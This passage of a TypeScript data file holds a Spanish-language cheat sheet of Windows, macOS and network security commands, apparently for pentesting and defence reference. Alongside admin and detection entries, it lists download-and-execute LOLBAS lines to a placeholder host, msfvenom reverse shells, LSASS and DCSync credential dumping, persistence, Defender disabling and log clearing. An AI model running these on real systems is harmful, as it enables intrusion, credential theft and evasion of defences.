      { cmd: 'Get-NetTCPConnection -State Listen | ft LocalAddress,LocalPort,OwningProcess', desc: 'Puertos en escucha (PS)' },
      { cmd: 'Get-DnsClientServerAddress', desc: 'DNS por interfaz' },
      { cmd: 'nslookup -type=SRV _ldap._tcp.dc._msdcs.dominio.com', desc: 'Descubrir DCs del dominio' },
      { cmd: 'whoami /priv && whoami /groups', desc: 'Privilegios y grupos del usuario' },
      { cmd: 'systeminfo | findstr /B /C:"OS"', desc: 'Versión de Windows' },
      { cmd: 'systeminfo | findstr Hotfix', desc: 'Parches instalados (falta KB = exploit?)' },
      { cmd: 'wmic qfe get Caption,HotFixID', desc: 'Hotfixes (alias WMIC)' },
      { cmd: 'Get-ComputerInfo -Property "*version*" | fl', desc: 'Versión detallada (PS)' },
      { cmd: 'tracert 8.8.8.8 && pathping 8.8.8.8', desc: 'Ruta y pérdidas por salto' },
      { cmd: 'netsh wlan show profiles && netsh wlan show profile name="Red" key=clear', desc: 'WiFi guardada y su CLAVE en claro' },
      { cmd: 'netsh advfirewall show allprofiles state', desc: 'Estado del firewall por perfil' },
      { cmd: 'Get-NetFirewallRule -Enabled True | ft DisplayName,Direction,Action', desc: 'Reglas activas del firewall' },
      { cmd: 'Test-NetConnection host -Port 443', desc: 'Test de conectividad a puerto (PS)' },
      { cmd: 'Resolve-DnsName dominio.com -Type MX', desc: 'DNS desde PowerShell' },
      { cmd: 'certutil -urlcache -f http://IP/f f.exe', desc: 'Descargar fichero (LOLBAS clásico)' },
      { cmd: 'bitsadmin /transfer job http://IP/f.exe C:\\\\Temp\\\\f.exe', desc: 'Descarga con BITS (evade básico)' },
    ],
  },
  {
    name: 'Defensa / artefactos',
    items: [
      { cmd: 'Get-Process | Sort-Object CPU -Desc | Select -First 10', desc: 'Top procesos por CPU' },
      { cmd: 'Get-ScheduledTask | ? State -eq "Ready"', desc: 'Tareas programadas' },
      { cmd: 'wevtutil qe Security /c:10 /rd:true /f:text', desc: 'Últimos eventos de seguridad' },
      { cmd: 'Get-ItemProperty HKLM:\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run', desc: 'Persistencia por registro (Run keys)' },
      { cmd: 'Get-MpComputerStatus && Get-MpThreatDetection', desc: 'Estado de Defender y detecciones' },
      { cmd: 'Get-NetFirewallProfile | ft Name,Enabled', desc: 'Perfiles del firewall' },
      { cmd: 'reg save HKLM\\\\SAM sam.hiv && reg save HKLM\\\\SYSTEM sys.hiv', desc: 'Exportar colmenas (análisis con secretsdump)' },
      { cmd: 'Get-WinEvent -LogName Security -MaxEvents 50 | ft TimeCreated,Id,Message', desc: 'Eventos de seguridad (PS)' },
      { cmd: 'wevtutil qe System /c:20 /rd:true /f:text | findstr /i "fail error"', desc: 'Errores del sistema recientes' },
      { cmd: 'Get-ChildItem C:\\\\Users -Recurse -Include *.pdf,*.doc*,*.txt -ErrorAction SilentlyContinue', desc: 'Documentos de usuarios (data discovery)' },
      { cmd: 'Get-ChildItem -Path . -Filter *.ps1 -Recurse | Select FullName', desc: 'Inventario de scripts PS' },
      { cmd: 'wmic process list full | findstr /i "commandline"', desc: 'Líneas de comando de procesos (secretos en args?)' },
      { cmd: 'Get-CimInstance Win32_StartupCommand | ft Name,Command,Location', desc: 'Arranques de usuario (persistencia)' },
      { cmd: 'autorunsc.exe -accepteula -a * > autoruns.txt', desc: 'Autologon y arranques (Sysinternals)' },
      { cmd: 'sigcheck.exe -a -h C:\\\\Windows\\\\System32\\\\suspicious.dll', desc: 'Firma y hash de binario (Sysinternals)' },
    ],
  },
  {
    name: 'Active Directory / dominio',
    items: [
      { cmd: 'net user /domain && net group "Domain Admins" /domain', desc: 'Usuarios y admins del dominio' },
      { cmd: 'net user usuario /domain', desc: 'Info de un usuario concreto' },
      { cmd: 'nltest /dclist:dominio.com', desc: 'Lista de Domain Controllers' },
      { cmd: 'Get-ADDomain | fl DnsRootName,NetBIOSName,DomainMode', desc: 'Info del dominio (RSAT)' },
      { cmd: 'Get-ADUser -Filter * -Properties adminCount | ? adminCount -eq 1 | sAMAccountName', desc: 'Usuarios con adminCount=1' },
      { cmd: '[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()', desc: 'Dominio sin módulos RSAT' },
      { cmd: 'PowerView: Get-NetUser | select samaccountname,description', desc: 'Descripciones de usuarios (¡passwords!)' },
      { cmd: 'PowerView: Find-LocalAdminAccess', desc: 'Dónde eres admin local' },
      { cmd: 'BloodHound: SharpHound.exe -c All --zipfilename out', desc: 'Recolectar grafo AD completo' },
      { cmd: 'impacket-GetNPUsers dominio/ -dc-ip IP -usersfile users.txt', desc: 'AS-REP Roasting (sin password)' },
      { cmd: 'impacket-GetUserSPNs dominio/user:pass -dc-ip IP -request', desc: 'Kerberoasting (TGS a crackear)' },
      { cmd: 'secretsdump.py dominio/user:pass@IP', desc: 'Volcar NTDS/secrets remoto' },
      { cmd: 'rubeus kerberoast /outfile:spns.txt', desc: 'Kerberoasting nativo Windows' },
      { cmd: 'dsquery user -inactive 4 -limit 0', desc: 'Usuarios inactivos 4 semanas (objetivos)' },
      { cmd: 'net localgroup Administradores /domain', desc: 'Grupo de administradores del dominio' },
      { cmd: 'klist && klist purge', desc: 'Ver y limpiar tickets Kerberos' },
      { cmd: 'dir \\\\DC01\\\\SYSVOL /s | findstr groups.xml', desc: 'GPP con passwords (MS14-025)' },
    ],
  },
  {
    name: 'PowerShell útil',
    items: [
      { cmd: 'Get-Help Get-EventLog -Examples', desc: 'Ayuda con ejemplos' },
      { cmd: 'Get-ChildItem -Recurse -Force | ? Attributes -match Hidden', desc: 'Ficheros ocultos' },
      { cmd: 'Get-Content fichero.log -Tail 50 -Wait', desc: "tail -f equivalent" },
      { cmd: 'Select-String -Path *.log -Pattern "error" -CaseSensitive:$false', desc: 'grep equivalent' },
      { cmd: 'Invoke-WebRequest -Uri http://IP -UseBasicParsing', desc: 'HTTP GET (iwr)' },
      { cmd: 'IEX(IWR http://IP/script.ps1 -UseBasicParsing)  # lab/CTF', desc: 'Cargar script en memoria (descargar y revisar primero)' },
      { cmd: 'Invoke-Mimikatz  # (del módulo PowerSploit, solo lab)', desc: 'Dump de credenciales en memoria' },
      { cmd: 'Get-Service | ? {$_.Status -eq "Running"} | ft Name,DisplayName', desc: 'Servicios en ejecución' },
      { cmd: 'Start-Process powershell -Verb RunAs  # UAC prompt', desc: 'Elevar (requiere interacción)' },
      { cmd: 'ConvertTo-SecureString "pass" -AsPlainText -Force', desc: 'Crear credencial PS' },
      { cmd: 'Get-Credential | Export-Clixml cred.xml', desc: 'Guardar credencial cifrada DPAPI' },
      { cmd: 'Import-Clixml cred.xml | fl *', desc: 'Recuperar (DPAPI reversível por el mismo usuario)' },
      { cmd: 'Get-LocalUser | ft Name,Enabled,LastLogon', desc: 'Usuarios locales' },
      { cmd: 'Get-LocalGroupMember Administradores', desc: 'Miembros de Administradores local' },
      { cmd: 'Get-NetSession -ComputerName DC01 | ft Cname,UserName', desc: 'Sesiones activas (para Kerberoast relay)' },
      { cmd: 'Get-WmiObject Win32_LogicalDisk | ft DeviceID,FreeSpace,Size', desc: 'Discos y espacio' },
      { cmd: 'Compress-Archive -Path C:\\\\datos -DestinationPath C:\\\\Temp\\\\d.zip', desc: 'Zip para exfiltrar' },
      { cmd: 'Expand-Archive -Path d.zip -DestinationPath C:\\\\destino', desc: 'Descomprimir' },
    ],
  },
  {
    name: 'LOLBAS y ejecución',
    items: [
      { cmd: 'mshta http://IP/payload.hta', desc: 'Ejecución vía HTA (LOLBAS)' },
      { cmd: 'rundll32 javascript:"\\\\..\\\\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WScript.Shell")', desc: 'Ejecutar JS desde rundll32' },
      { cmd: 'wscript //B payload.vbs && cscript //nologo payload.vbs', desc: 'Ejecutar VBS' },
      { cmd: 'installutil.exe /logfile= /LogToConsole=false /U payload.exe', desc: 'Bypass de whitelisting (requieresemblies)' },
      { cmd: 'regsvr32 /s /n /u /i:http://IP/file.sct scrobj.dll', desc: 'Squiblydoo (descarga y ejecuta SCT)' },
      { cmd: 'forfiles /p C:\\\\Windows\\\\System32 /m cmd.exe /c "cmd /c calc.exe"', desc: 'Ejecutar con forfiles (padre distinto)' },
      { cmd: 'diskshadow.exe "exec payload.exe"', desc: 'Ejecución con diskshadow (LOLBAS)' },
      { cmd: 'cl_invocation.ps1: https://lolbas-project.github.io', desc: 'Referencia canónica de LOLBAS' },
      { cmd: 'certreq.exe -Post -config http://IP/file.txt out.txt', desc: 'Exfiltración/descarga con certreq' },
      { cmd: 'curl.exe -O http://IP/f.exe (Win10+ trae curl)', desc: 'Descarga nativa moderna' },
      { cmd: 'tar.exe -xf f.zip (Win10+ trae bsdtar)', desc: 'Extracción nativa' },
      { cmd: 'schtasks /create /tn tarea /tr C:\\\\payload.exe /sc onlogon /ru SYSTEM', desc: 'Persistencia por tarea programada' },
      { cmd: 'sc create servicio binPath= "C:\\\\payload.exe" start= auto', desc: 'Persistencia por servicio' },
      { cmd: 'at 13:37 /interactive cmd  (legacy, Win7)', desc: 'Tarea interactiva at (legacy)' },
    ],
  },
  {
    name: 'Escalada y privesc Windows',
    items: [
      { cmd: 'whoami /priv | findstr /i "Impersonate AssignPrimaryToken"', desc: 'Potato check: SeImpersonate/SeAssignPrimaryToken' },
      { cmd: 'whoami /priv | findstr /i "SeBackup SeRestore SeDebug SeTakeOwnership"', desc: 'Otros privilegios peligrosos' },
      { cmd: 'reg query HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Installer /v AlwaysInstallElevated', desc: 'AlwaysInstallElevated (privesc MSI)' },
      { cmd: 'winPEAS.exe quiet systeminfo', desc: 'Enum completa automática' },
      { cmd: 'PowerUp.ps1: Invoke-AllChecks', desc: 'Todos los checks de PowerUp' },
      { cmd: 'Seatbelt.exe -group=all  # o -group=system', desc: 'Enum estructurada (sharp collection)' },
      { cmd: 'accesschk.exe -uws "Users" C:\\\\', desc: 'Servicios/ficheros modificables' },
      { cmd: 'reg query HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services | findstr /i "ImagePath"', desc: 'Buscar paths no entrecomicados' },
      { cmd: 'sc query | findstr /i "SERVICE_NAME" && sc qc nombre', desc: 'Config de cada servicio (binPath/BINARY_PATH)' },
      { cmd: 'dir /a "C:\\\\Program Files (x86)\\\\*" | findstr /i "service"', desc: 'Carpetas de servicio (¿escribibles?)' },
      { cmd: 'icacls "C:\\\\Program Files\\\\servicio\\\\bin.exe"', desc: '¿Puedo reemplazar el binario?' },
      { cmd: 'cmdkey /list && runas /savecred /user:DOM\\\\admin "cmd.exe /c whoami"', desc: 'Credenciales guardadas (runas /savecred)' },
      { cmd: 'Get-ItemProperty "HKLM:\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon" | fl DefaultUserName,DefaultPassword', desc: 'Autologon con password en registro' },
      { cmd: 'reg query HKCU /f password /t REG_SZ /s', desc: 'Buscar "password" en HKCU' },
      { cmd: 'Get-VirtualMachine | ft Name,Status  # o: Get-ChildItem Env: | findstr VMware', desc: '¿Estoy en VM? (evade/awareness)' },
      { cmd: 'UnquotedPath: wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\\\\Windows\\\\"', desc: 'Servicios con path sin comillas' },
    ],
  },
  {
    name: 'Offensive Windows / C2',
    items: [
      { cmd: 'psexec \\\\objetivo cmd', desc: 'Shell remota Sysinternals (admin)' },
      { cmd: 'impacket-wmiexec usuario:pass@IP', desc: 'WMI semi-interactiva' },
      { cmd: 'impacket-atexec usuario:pass@IP "cmd"', desc: 'Ejecución por tarea programada' },
      { cmd: 'impacket-smbexec usuario:pass@IP', desc: 'Shell SMB (PSEXEC-like)' },
      { cmd: 'winrs -r:objetivo cmd  # o: winrs -r:objetivo powershell', desc: 'Shell remota WinRM nativa' },
      { cmd: 'Enter-PSSession -ComputerName DC01 -Credential DOM\\\\user', desc: 'WinRM desde PS' },
      { cmd: 'evil-winrm -i IP -u usuario -p pass  # o: -H HASH', desc: 'WinRM con pass o hash NTLM (PTH)' },
      { cmd: 'impacket-psexec -hashes :NTLM_HASH usuario@IP', desc: 'Pass-the-Hash con impacket' },
      { cmd: 'mimikatz: sekurlsa::logonpasswords  (lab autorizado)', desc: 'Dump de credenciales en memoria' },
      { cmd: 'mimikatz: lsadump::dcsync /domain:dom /user:Administrator', desc: 'DCSync: extraer hash de cualquier usuario' },
      { cmd: 'ntdsutil "ac i ntds" "ifm" "create full C:\\\\ntds" q q', desc: 'Volcado NTDS.dit local (necesita DC)' },
      { cmd: 'procdump -ma lsass.exe lsass.dmp  # luego: pypykatz lsa minidump', desc: 'Dump LSASS (requiere SeDebug)' },
      { cmd: 'rundll32 comsvcs.dll MiniDump PID dump.bin full', desc: 'Dump LSASS sin procdump (comsvcs)' },
      { cmd: 'hashcat -m 1000 ntdlm.txt rockyou.txt', desc: 'Crackear hashes NTLM' },
      { cmd: 'hashcat -m 18200 kerberoast.txt rockyou.txt', desc: 'Crackear tickets TGS (Kerberoast)' },
      { cmd: 'sharpchalice/pypykatz lsa minidump lsass.dmp', desc: 'Parsear dump de LSASS offline' },
      { cmd: 'SharpRDP.exe computername=DC01 command="net user hax Pass123! /add /domain" username=DOM\\\\user password=pass', desc: 'Ejecución RDP' },
      { cmd: 'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o rev.exe', desc: 'Payload meterpreter (solo lab)' },
      { cmd: 'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f psh -o rev.ps1', desc: 'Payload en PowerShell' },
      { cmd: 'msfvenom -p cmd/windows/reverse_powershell LHOST=IP LPORT=4444 -f raw -o rev.bat', desc: 'Payload bat simple' },
    ],
  },
  {
    name: 'Defensa avanzada / EDR',
    items: [
      { cmd: 'Get-MpPreference | fl ExclusionPath,ExclusionProcess', desc: 'Exclusiones de Defender (atacantes las buscan)' },
      { cmd: 'Add-MpPreference -ExclusionPath "C:\\\\Temp"', desc: 'Añadir exclusión (defensa lo evita; test de política)' },
      { cmd: 'Set-MpPreference -DisableRealtimeMonitoring $true', desc: 'Desactivar en tiempo real (requiere admin; lab)' },
      { cmd: 'Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct', desc: 'AV instalado y estado' },
      { cmd: 'Get-Process | ? {$_.ProcessName -match "sense|crowdstrike|sentinel|carbon|cylance|defender|avg|mcafee|symantec"}', desc: '¿Qué EDR/AV corre aquí?' },
      { cmd: 'Get-ScheduledTask | ? {$_.Actions.Execute -match "edr|sense|crowd"}', desc: 'Tareas de mantenimiento del EDR' },
      { cmd: 'Get-WinEvent -ListLog * | ? {$_.RecordCount -gt 0} | select LogName,RecordCount', desc: 'Logs activos (anti-forense: qué borran)' },
      { cmd: 'wevtutil cl Security  # ¡DESTRUYE EVIDENCIA! solo en lab para entender', desc: 'Borrado de log (defensa: alertar si ocurre)' },
      { cmd: 'Get-WinEvent -FilterHashtable @{LogName="Security";Id=4624,4625} -MaxEvents 20', desc: 'Logins OK/fallidos (detcción fuerza bruta)' },
      { cmd: 'Get-WinEvent -FilterHashtable @{LogName="Microsoft-Windows-PowerShell/Operational"} -MaxEvents 20 | fl Message', desc: 'Log de PowerShell (Module Logging habilitado?)' },
      { cmd: 'auditpol /get /category:*', desc: 'Política de auditoría completa' },
      { cmd: 'New-NetFirewallRule -DisplayName "Block C2" -Direction Outbound -RemoteAddress 1.2.3.4 -Action Block', desc: 'Regla de bloqueo (defensa inmediata)' },
    ],
  },
  {
    name: 'Red Windows',
    items: [
      { cmd: 'Get-NetRoute | ft DestinationPrefix,NextHop,InterfaceAlias', desc: 'Tabla de rutas (PS)' },
      { cmd: 'New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.1.50 -PrefixLength 24 -DefaultGateway 192.168.1.1', desc: 'IP estática con PS' },
      { cmd: 'Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 8.8.8.8', desc: 'Cambiar DNS' },
      { cmd: 'Test-NetConnection -ComputerName DC01 -Port 389 -InformationLevel Detailed', desc: 'Test LDAP (conectividad AD)' },
      { cmd: 'netsh interface portproxy add v4tov4 listenport=8080 connectaddress=10.0.0.5 connectport=80', desc: 'Port forwarding nativo (pivoting)' },
      { cmd: 'netsh interface portproxy show all', desc: 'Ver proxies configurados' },
      { cmd: 'netsh trace start capture=yes tracefile=C:\\\\trace.etl && netsh trace stop', desc: 'Captura de paquetes nativa' },
      { cmd: 'pktmon start --etw -m multi-file && pktmon stop && pktmon etl2pcap out.etl -o out.pcap', desc: 'Captura moderna (pktmon, Win10+)' },
      { cmd: 'Add-Content -Path C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts -Value "10.0.0.5 interno.local"', desc: 'Modificar hosts (requiere admin)' },
      { cmd: 'Get-SmbShare && Get-SmbConnection', desc: 'Shares y conexiones SMB activas' },
      { cmd: 'net use \\\\IP\\\\share /user:DOM\\\\user pass', desc: 'Montar share con credenciales' },
      { cmd: 'Get-SmbOpenFile -ComputerName SERVER01', desc: 'Ficheros abiertos por sesiones SMB' },
    ],
  },
  {
    name: 'ACL NTFS e icacls',
    items: [
      { cmd: 'icacls "C:\\datos" /save acl.txt /t /c', desc: 'Respaldar TODAS las ACLs de un árbol' },
      { cmd: 'icacls "C:\\datos" /restore acl.txt', desc: 'Restaurar ACLs desde el respaldo' },
      { cmd: 'icacls "C:\\datos" /grant "DOM\\Grupo:(OI)(CI)M" /t', desc: 'Conceder Modify heredable a objetos y contenedores' },
      { cmd: 'icacls "C:\\datos" /remove:g "Usuarios" /t /c', desc: 'Quitar a un grupo de todo el árbol' },
      { cmd: 'icacls "C:\\datos" /deny "Invitado:(OI)(CI)F"', desc: 'Denegación explícita (gana siempre sobre allow)' },
      { cmd: 'icacls "C:\\datos" /inheritance:d /grant:r "Admins:F"', desc: 'Deshabilitar herencia conservando permisos heredados' },
      { cmd: 'icacls "C:\\datos" /reset /t /c', desc: 'Volver a herencia del padre (borrar ACLs explícitas)' },
      { cmd: 'icacls fichero.txt /setowner "DOM\\admin"', desc: 'Cambiar propietario (equivale a chown)' },
      { cmd: 'Get-Acl C:\\datos | fl Owner,AccessToString', desc: 'Ver ACL completa desde PowerShell' },
      { cmd: 'Get-Acl f.txt | Set-Acl copia.txt', desc: 'Clonar ACL entre ficheros (PS)' },
      { cmd: '(Get-Acl C:\\datos).Access | Where-Object AccessControlType -eq Deny', desc: 'Listar solo ACEs de denegación' },
      { cmd: 'icacls "C:\\$Recycle.Bin"', desc: 'Inspeccionar carpetas del sistema (¿quién puede leer?)' },
    ],
  },
  {
    name: 'Registro y servicios quirúrgico',
    items: [
      { cmd: 'reg query "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"', desc: 'Autoarranque por registro (persistencia nº1)' },
      { cmd: 'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v util /t REG_SZ /d "C:\\ruta\\p.exe" /f', desc: 'Añadir Run key (persistencia; solo lab)' },
      { cmd: 'reg export HKLM\\SYSTEM\\CurrentControlSet\\Services svc.reg', desc: 'Exportar rama de servicios para análisis offline' },
      { cmd: 'reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA /v RunAsPPL', desc: '¿LSA protegido? (credenciales en memoria)' },
      { cmd: 'sc.exe qc servicio && sc.exe sdshow servicio', desc: 'Config y SDDL de seguridad de un servicio' },
      { cmd: 'sc.exe config servicio binPath= "C:\\nuevo.exe" start= auto', desc: 'Reconfigurar binario de un servicio (¡espacio tras =!)' },
      { cmd: 'sc.exe sdset servicio D:(A;;CCLCSWRPWPDTLOCRRC;;;WD)', desc: 'Cambiar descriptor de seguridad del servicio' },
      { cmd: 'Get-Service | Where-Object StartType -eq Automatic | ft Name,Status', desc: 'Servicios automáticos (¿cuáles no corren? hijack)' },
      { cmd: 'Get-CimInstance Win32_Service | Where-Object PathName -notmatch "C:\\Windows" | ft Name,PathName,StartName', desc: 'Servicios fuera de Windows dir y su cuenta' },
      { cmd: 'Get-ItemProperty "HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" | fl ProductName,DisplayVersion,UBR', desc: 'Build exacta de Windows (patch level)' },
      { cmd: 'reg query HKCU\\Software /s /f password /d 2>$null', desc: 'Buscar "password" en HKCU' },
    ],
  },
  {
    name: 'Shares y PowerShell remoto',
    items: [
      { cmd: 'net share && Get-SmbShare', desc: 'Shares locales publicados' },
      { cmd: 'net view \\\\DC01 /all', desc: 'Shares de otro equipo (recon SMB)' },
      { cmd: 'Get-SmbMapping && net use', desc: 'Unidades montadas y por qué sesión' },
      { cmd: 'smbcacls //servidor/share fichero -U DOM\\user', desc: 'ACLs SMB desde Linux (samba-tools)' },
      { cmd: 'New-SmbShare -Name deploy -Path C:\\deploy -ReadAccess Everyone', desc: 'Crear share para despliegues (peligro: revisar permisos)' },
      { cmd: 'Set-SmbPathAcl -ShareName deploy -AccountName "DOM\\admins"', desc: 'Alinear ACL NTFS del share con el share' },
      { cmd: 'Enable-PSRemoting -Force && Set-Item WSMan:localhost\\Client\\TrustedHosts -Value "*" -Force', desc: 'Habilitar WinRM (lab; TrustedHosts * = mal olor)' },
      { cmd: 'Invoke-Command -ComputerName SRV01 -ScriptBlock { hostname } -Credential $cred', desc: 'Ejecución remota PS (PSRP)' },
      { cmd: 'Copy-Item -ToSession $s -Path local.txt -Destination C:\\Temp\\', desc: 'Copia por sesión PS remota (sin SMB)' },
      { cmd: 'Get-WinEvent -LogName Microsoft-Windows-SMBServer/Security -MaxEvents 20', desc: 'Eventos de seguridad SMB (accesos)' },
      { cmd: 'robocopy C:\\datos \\\\destino\\share$ /E /Z /COPYALL /DCOPY:DAT', desc: 'Réplica con atributos y reanudación' },
      { cmd: 'dir /s /b \\\\DC01\\SYSVOL\\*.xml 2>nul', desc: 'GPP y XMLs interesantes en SYSVOL' },
    ],
  },
]

export const MAC_CHEATS: CheatCategory[] = [
  {
    name: 'Enumeración del sistema',
    items: [
      { cmd: 'sw_vers && uname -m', desc: 'Versión de macOS y arquitectura (arm64/intel)' },
      { cmd: 'system_profiler SPSoftwareDataType SPHardwareDataType', desc: 'Hardware y sistema completo' },
      { cmd: 'id && groups', desc: 'Usuario actual y grupos (¿staff? ¿admin?)' },
      { cmd: 'dscl . -list /Users | grep -v ^_', desc: 'Usuarios "reales" del sistema' },
      { cmd: 'dscl . -read /Users/administrator AuthenticationAuthority 2>/dev/null', desc: 'Tipo de cuenta (SecureToken, FileVault)' },
      { cmd: 'sudo fdesetup status', desc: 'Estado de FileVault (cifrado de disco)' },
      { cmd: 'csrutil status', desc: 'SIP activo o desactivado (protección del sistema)' },
      { cmd: 'spctl --status && spctl --assess /ruta/app', desc: 'Gatekeeper y evaluación de una app' },
      { cmd: 'nvram -p | grep -i secureboot', desc: 'Nivel de Secure Boot (full/medium/off)' },
      { cmd: 'launchctl list | grep -v com.apple | head -30', desc: 'Servicios de terceros (persistencia)' },
      { cmd: 'kextstat | grep -v com.apple', desc: 'Kernel extensions de terceros' },
      { cmd: 'ls /Applications && ls ~/Applications 2>/dev/null', desc: 'Apps instaladas' },
      { cmd: 'lsof -i -P | grep -i listen', desc: 'Puertos en escucha' },
      { cmd: 'netstat -an -p tcp | grep LISTEN', desc: 'Puertos TCP en escucha (nativo)' },
    ],
  },
  {
    name: 'Seguridad y TCC',
    items: [
      { cmd: 'sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db \'SELECT client,auth_value FROM access\' 2>/dev/null', desc: 'Permisos TCC del usuario (cámara, mic, disco)' },
      { cmd: 'sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db \'SELECT client,auth_value FROM access\' 2>/dev/null', desc: 'Permisos TCC del sistema (requiere FDA)' },
      { cmd: 'log show --last 1h --predicate \'eventMessage contains "denied"\' --style compact 2>/dev/null', desc: 'Denegaciones del unified log (última hora)' },
      { cmd: 'log show --last 30m --predicate \'subsystem == "com.apple.syslogd"\' --style compact', desc: 'Logs del sistema unificados' },
      { cmd: 'xattr -l fichero && xattr -d com.apple.quarantine app.app', desc: 'Atributos extendidos y cuarentena (Gatekeeper)' },
      { cmd: 'codesign -dv --verbose=2 /ruta/app 2>&1', desc: 'Firma y entitlements de una app' },
      { cmd: 'codesign -d --entitlements :- /ruta/app 2>/dev/null', desc: 'Entitlements (¿com.apple.security.cs.disable-library-validation?)' },
      { cmd: 'amfi_get_out_of_my_way=0x1  # (boot-args, NO usar en producción)', desc: 'Desactivar AMFI (referencia, solo research)' },
      { cmd: 'sudo pkill -9 securityd  # lab: fuerza re-evaluación', desc: 'Reiniciar securityd (solo entornos de test)' },
      { cmd: 'ls -la /Library/LaunchDaemons /Library/LaunchAgents ~/Library/LaunchAgents', desc: 'Persistencia clásica de macOS' },
      { cmd: 'osascript -e \'display dialog "test"\'', desc: 'Ejecutar AppleScript (phishing de contraseñas en lab)' },
      { cmd: 'sudo log stream --predicate \'process == "sshd"\' --style compact', desc: 'Logs SSH en vivo' },
    ],
  },
  {
    name: 'Red y utilidades',
    items: [
      { cmd: 'ifconfig && netstat -rn', desc: 'Interfaces y rutas (formato BSD)' },
      { cmd: 'networksetup -listallnetworkservices && networksetup -getdnsservers Wi-Fi', desc: 'Servicios de red y DNS' },
      { cmd: 'airport -s 2>/dev/null || sudo wdutil info', desc: 'Redes WiFi visibles / info detallada' },
      { cmd: 'sudo tcpdump -i en0 -nn -c 50', desc: 'Capturar 50 paquetes en en0' },
      { cmd: 'scutil --dns | head -20', desc: 'Configuración DNS del resolvedor' },
      { cmd: 'arp -a && arp -d  # (borrado requiere think)', desc: 'Tabla ARP' },
      { cmd: 'dns-sd -B _smb._tcp local.', desc: 'Descubrir servicios Bonjour/mDNS' },
      { cmd: 'defaults read com.apple.finder && defaults write com.apple.finder AppleShowAllFiles -bool true; killall Finder', desc: 'Defaults: ver ficheros ocultos en Finder' },
      { cmd: 'caffeinate -t 3600', desc: 'Evitar sleep durante 1h (útil en auditorías largas)' },
      { cmd: 'hdiutil attach img.dmg && hdiutil create -size 100m -fs APFS test.dmg', desc: 'Montar/crear imágenes de disco' },
      { cmd: 'csrutil disable  # (desde RecoveryOS)', desc: 'Desactivar SIP (requiere Recovery, referencia)' },
      { cmd: 'softwareupdate --history', desc: 'Historial de actualizaciones instaladas' },
    ],
  },
  {
    name: 'Persistencia y mitigaciones',
    items: [
      { cmd: 'ls -la ~/Library/LaunchAgents /Library/LaunchAgents /Library/LaunchDaemons 2>/dev/null', desc: 'Los tres clásicos de persistencia' },
      { cmd: 'plutil -p /Library/LaunchDaemons/com.suspicious.plist', desc: 'Ver qué ejecuta un LaunchDaemon' },
      { cmd: 'launchctl print gui/$UID | grep -A3 suspicious', desc: 'Estado real de un agent cargado' },
      { cmd: 'sudo launchctl bootout system /Library/LaunchDaemons/x.plist', desc: 'Descargar un daemon en caliente' },
      { cmd: 'crontab -l 2>/dev/null; ls -la /usr/lib/cron/tabs/ 2>/dev/null', desc: 'Cron también existe en macOS' },
      { cmd: 'log show --last 2h --predicate "subsystem == com.apple.loginwindow" --style compact 2>/dev/null', desc: 'Logins y desbloqueos recientes' },
      { cmd: 'sudo spctl --master-disable  # solo en lab, nunca en producción', desc: 'Desactivar Gatekeeper (referencia)' },
      { cmd: 'sudo tccutil reset All bundle.id', desc: 'Resetear permisos TCC de una app' },
      { cmd: 'defaults read com.apple.loginwindow', desc: 'Hooks de loginwindow (¡persistencia!)' },
      { cmd: 'sqlite3 "$HOME/Library/Application Support/com.apple.TCC/TCC.db" "SELECT client,service,auth_value FROM access ORDER BY last_modified DESC LIMIT 15" 2>/dev/null', desc: 'Últimos cambios de permisos TCC' },
      { cmd: 'systemextensionsctl list', desc: 'Extensiones de sistema (EDR moderno usa esto)' },
      { cmd: 'kextstat | grep -v apple', desc: 'KEXTs de terceros (legacy pero vivo)' },
    ],
  },
]

export const NETWORK_CHEATS: CheatCategory[] = [
  {
    name: 'Subnetting y direcciones',
    items: [
      { cmd: 'ipcalc 192.168.1.0/24  # o sipcalc', desc: 'Calcular red, broadcast, rango y máscara' },
      { cmd: 'python3 -c "import ipaddress; print(list(ipaddress.ip_network(\'10.0.0.0/24\').hosts())[:5])"', desc: 'Hosts de una subred con Python' },
      { cmd: 'whois 8.8.8.8 | grep -iE "netname|org|country"', desc: 'Dueño de una IP' },
      { cmd: 'whois dominio.com | grep -iE "registrar|expiry|nameserver"', desc: 'Datos de registro de un dominio' },
      { cmd: 'dig +trace dominio.com', desc: 'Resolución recursiva completa desde raíz' },
      { cmd: 'dig dominio.com axfr @ns1.dominio.com', desc: 'Transferencia de zona (mal configurada = oro)' },
      { cmd: 'host -t mx dominio.com && host -t txt dominio.com', desc: 'MX y TXT (SPF/DKIM/verificación)' },
      { cmd: 'nslookup -type=ns dominio.com 1.1.1.1', desc: 'Nameservers vía resolver público' },
      { cmd: 'curl -s https://ipinfo.io/IP/json', desc: 'GeoIP/ASN desde CLI' },
      { cmd: 'openssl s_client -connect host:443 -servername host 2>/dev/null | openssl x509 -noout -dates -subject -issuer', desc: 'Inspeccionar certificado TLS' },
      { cmd: 'openssl s_client -connect host:443 -tls1_2', desc: 'Forzar TLS 1.2 (probar versiones antiguas)' },
      { cmd: 'nmap --script ssl-enum-ciphers -p 443 host', desc: 'Ciphersuites y protocolos soportados' },
    ],
  },
  {
    name: 'Captura y análisis',
    items: [
      { cmd: 'tcpdump -i eth0 -nn host 10.0.0.5 and port 443 -w trafico.pcap', desc: 'Capturar tráfico de un host a pcap' },
